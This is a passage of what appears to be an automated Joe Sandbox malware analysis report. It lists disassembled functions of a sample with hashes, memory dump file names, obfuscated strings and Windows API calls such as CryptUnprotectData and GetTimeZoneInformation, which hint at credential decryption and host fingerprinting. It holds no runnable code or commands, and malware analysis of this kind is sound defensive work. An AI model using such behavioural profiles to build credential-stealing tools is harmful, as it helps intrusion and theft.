                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <7\h$huzx
                                  • API String ID: 0-2989614873
                                  • Opcode ID: 0b4b1464afc0634d8d2033b0489ac61830e1d8ec97bfd4902855924fcb8dee6e
                                  • Instruction ID: 5145b27117c992492680ff2d4720e1e5cb054ad0c8990ed48b2e040d50c13d7e
                                  • Opcode Fuzzy Hash: 0b4b1464afc0634d8d2033b0489ac61830e1d8ec97bfd4902855924fcb8dee6e
                                  • Instruction Fuzzy Hash: 8063637341EBD51ECB27EB3047B61917F66FA1331031869CEC4C9AB4B3CA909A16E356
                                  Function 012ACE79 Relevance: 6.7, Strings: 4, Instructions: 1667COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ,zbH$..qz$V8_n$ck}-
                                  • API String ID: 0-2735418471
                                  • Opcode ID: d6f14fea0d0a361dc0106ee134c5372a36d638cb8d61b41256e841e893858198
                                  • Instruction ID: a07d9109fbd85a5c257e8c98739cb7cca175b1d5f77547d7d71421c243b3b9a7
                                  • Opcode Fuzzy Hash: d6f14fea0d0a361dc0106ee134c5372a36d638cb8d61b41256e841e893858198
                                  • Instruction Fuzzy Hash: 10B237F3A082149FE304AE2DEC8567AFBE9EF94720F1A453DEAC4C3744E63558058697
                                  Function 012BF503 Relevance: 6.6, Strings: 4, Instructions: 1612COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Rbo$>O?m$Fv~F$|_~
                                  • API String ID: 0-1694952782
                                  • Opcode ID: 878c3cebaef23b80d13cdde7d81d2ce41db7ee1021fce94ea36f9c6149e2afa2
                                  • Instruction ID: dc0bdbc90708b6a1cab3073afb6c56e5c4fcc2801bc1af6523eb4691705c05d0
                                  • Opcode Fuzzy Hash: 878c3cebaef23b80d13cdde7d81d2ce41db7ee1021fce94ea36f9c6149e2afa2
                                  • Instruction Fuzzy Hash: 1EB207F360C2049FE304AE29EC8567ABBE9EF94720F16493DEAC5C3744E63598418797
                                  Function 012C0F06 Relevance: 6.6, Strings: 4, Instructions: 1574COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (tG$1@__$SZ7$vhOw
                                  • API String ID: 0-3305334
                                  • Opcode ID: 4a6228944cacb11029378412641005a94b6df7bc4708a49d9c86dd4fdf49063a
                                  • Instruction ID: a8505e5c94f7387a92daad74c8a273a78de125944d10d47a7ba44fd496043d9b
                                  • Opcode Fuzzy Hash: 4a6228944cacb11029378412641005a94b6df7bc4708a49d9c86dd4fdf49063a
                                  • Instruction Fuzzy Hash: D2B2E5F3A0C2109FE304AE2DEC8567ABBE9EF94720F16493DEAC4C7744E63558058697
                                  Function 00E79030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00E651D4,40000001,00000000,00000000,?,00E651D4), ref: 00E79050
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 31d039622477c9c0cdf88921a01685a576dfe81bccddbedf0f40aedd07e1d164
                                  • Instruction ID: eb91ca9ea59fe7988a8e5e5487b76c8c8e38dc9bcb43818303dc71ca01bf0a33
                                  • Opcode Fuzzy Hash: 31d039622477c9c0cdf88921a01685a576dfe81bccddbedf0f40aedd07e1d164
                                  • Instruction Fuzzy Hash: BB1106B4210209FFDF04CF54D894FAA33A9AF8A314F10D458FA299B245D775E941DBA0
                                  Function 00E77BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0173DD20,00000000,?,00E80DF8,00000000,?,00000000,00000000), ref: 00E77BF3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E77BFA
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0173DD20,00000000,?,00E80DF8,00000000,?,00000000,00000000,?), ref: 00E77C0D
                                  • wsprintfA.USER32 ref: 00E77C47
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: 0932775ef2005828778eac3a31ef672eb7965b1b4d1908d7ed42261225b2a415
                                  • Instruction ID: 4e8a642b54f32f10da3fa831a5c726731c277be98dab58f5745ef8de0776bae1
                                  • Opcode Fuzzy Hash: 0932775ef2005828778eac3a31ef672eb7965b1b4d1908d7ed42261225b2a415
                                  • Instruction Fuzzy Hash: C411A1B1905218EBEB249B54DC45FA9B778FB48721F1047E5F619A32C4D7741A84CB50
                                  Function 012A988A Relevance: 5.4, Strings: 3, Instructions: 1636COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :RO$s+,$xM-
                                  • API String ID: 0-103202690
                                  • Opcode ID: 89357c16f6a425e8203bcae7c62f9f9b1af9572941e885eca634465881477d3c
                                  • Instruction ID: 29f696008a499f8e587eb8f4affd4a5deb528419c72e5456e1b9411dab7332f4
                                  • Opcode Fuzzy Hash: 89357c16f6a425e8203bcae7c62f9f9b1af9572941e885eca634465881477d3c
                                  • Instruction Fuzzy Hash: C8B216F3A0C6149FE3086E2DEC8567AFBE9EF94720F16493DE6C4C3744EA3558018696
                                  Function 012AB860 Relevance: 5.0, Strings: 3, Instructions: 1263COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 6m}M$6m}M$h#wi
                                  • API String ID: 0-2794162058
                                  • Opcode ID: 86db802626a7aae744697c33a1dad821913a4c5309e4160799851ce448eed6bd
                                  • Instruction ID: 35a6b73bff1995e8fb618534afc0178135bec1de53b3e848d232539a869b33eb
                                  • Opcode Fuzzy Hash: 86db802626a7aae744697c33a1dad821913a4c5309e4160799851ce448eed6bd
                                  • Instruction Fuzzy Hash: 0882D6F36082009FE714AE2DEC8577ABBE9EFD4720F19893DE6C4C3744E63598058696
                                  Function 012AF249 Relevance: 4.7, Strings: 3, Instructions: 923COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: *g&$^!s~$u6=
                                  • API String ID: 0-1718418126
                                  • Opcode ID: 0a4d7b0b7cef07cbfa63d1ec70faf86887132d4e3b9fbad5f172ed7b5e798770
                                  • Instruction ID: e89458b189123376a6944f8869a598874f5d44fc700dbcdb6a1d088514312980
                                  • Opcode Fuzzy Hash: 0a4d7b0b7cef07cbfa63d1ec70faf86887132d4e3b9fbad5f172ed7b5e798770
                                  • Instruction Fuzzy Hash: FF5209F3A0C2109FE314AE2DEC8566AFBE5EF94720F16893DEAC4C7344E63558058697
                                  Function 00E73970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.COMBASE(00E7E120,00000000,00000001,00E7E110,00000000), ref: 00E739A8
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00E73A00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: eb5c900e2ea70ef92847eb49d4bbf8f6c045dd84c00a4a90b1db4d67e57b8d36
                                  • Instruction ID: d99b742981b24fb8b71b739cf0e7d0fb7c29d90d7fe8df49deea3573470e88e2
                                  • Opcode Fuzzy Hash: eb5c900e2ea70ef92847eb49d4bbf8f6c045dd84c00a4a90b1db4d67e57b8d36
                                  • Instruction Fuzzy Hash: 6C410670A40A289FDB24DB58CC95F9BB7B5AB48302F4091D8E618E72D0D7B1AEC5CF50
                                  Function 00E6A2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E6A2D4
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E6A2F3
                                  • LocalFree.KERNEL32(?), ref: 00E6A323
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: c713aff33e2b453febfef417bfdd236895c02c46110a7ba5573525eea5ce2092
                                  • Instruction ID: 965db1481ed12d5b13958d7031d0e810c19aa8ad857fa827af2dc49460637147
                                  • Opcode Fuzzy Hash: c713aff33e2b453febfef417bfdd236895c02c46110a7ba5573525eea5ce2092
                                  • Instruction Fuzzy Hash: 8F11BAB5A00209DFCB04DFA4D985AAEB7B5FF89300F108569ED15A7394D730AE51CF61
                                  Function 00ED4BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
